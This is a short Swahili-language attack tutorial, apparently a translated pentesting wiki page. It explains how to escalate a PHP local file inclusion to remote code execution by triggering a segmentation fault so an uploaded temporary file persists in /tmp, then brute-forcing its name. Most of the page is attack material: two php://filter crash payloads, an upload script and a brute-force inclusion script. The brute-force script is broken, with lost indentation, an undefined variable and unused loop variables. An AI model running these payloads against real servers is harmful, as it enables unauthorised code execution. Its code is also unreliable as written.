LFI2RCE kupitia Segmentation Fault

Reading time: 3 minutes

Kulingana na maandiko https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/ (sehemu ya pili) na https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view, payloads zifuatazo zilisababisha segmentation fault katika PHP:

// PHP 7.0
include("php://filter/string.strip_tags/resource=/etc/passwd");

// PHP 7.2
include("php://filter/convert.quoted-printable-encode/resource=data://,%bfAAAAAAAAAAAAAAAAAAAAAAA%ff%ff%ff%ff%ff%ff%ff%ffAAAAAAAAAAAAAAAAAAAAAAAA");

Unapaswa kujua kwamba ikiwa unafanya POST ombi linalo jumuisha faili, PHP itaunda faili ya muda katika /tmp/php<something> yenye maudhui ya faili hiyo. Faili hii itafutwa kiotomatiki mara tu ombi litakaposhughulikiwa.

Ikiwa unapata LFI na unafanikiwa kuanzisha kosa la segmentation katika PHP, faili ya muda haitafutwa kamwe. Hivyo, unaweza kutafuta faili hiyo kwa kutumia udhaifu wa LFI hadi uipate na utekeleze msimbo usio na mipaka.

Unaweza kutumia picha ya docker https://hub.docker.com/r/easyengine/php7.0 kwa ajili ya majaribio.

# upload file with segmentation fault
import requests
url = "http://localhost:8008/index.php?i=php://filter/string.strip_tags/resource=/etc/passwd"
files = {'file': open('la.php','rb')}
response = requests.post(url, files=files)


# Search for the file (improve this with threads)
import requests
import string
import threading

charset = string.ascii_letters + string.digits

host = "127.0.0.1"
port = 80
base_url = "http://%s:%d" % (host, port)


def bruteforce(charset):
for i in charset:
for j in charset:
for k in charset:
for l in charset:
for m in charset:
for n in charset:
filename = prefix + i + j + k
url = "%s/index.php?i=/tmp/php%s" % (base_url, filename)
print url
response = requests.get(url)
if 'spyd3r' in response.content:
print "[+] Include success!"
return True


def main():
bruteforce(charset)

if __name__ == "__main__":
main()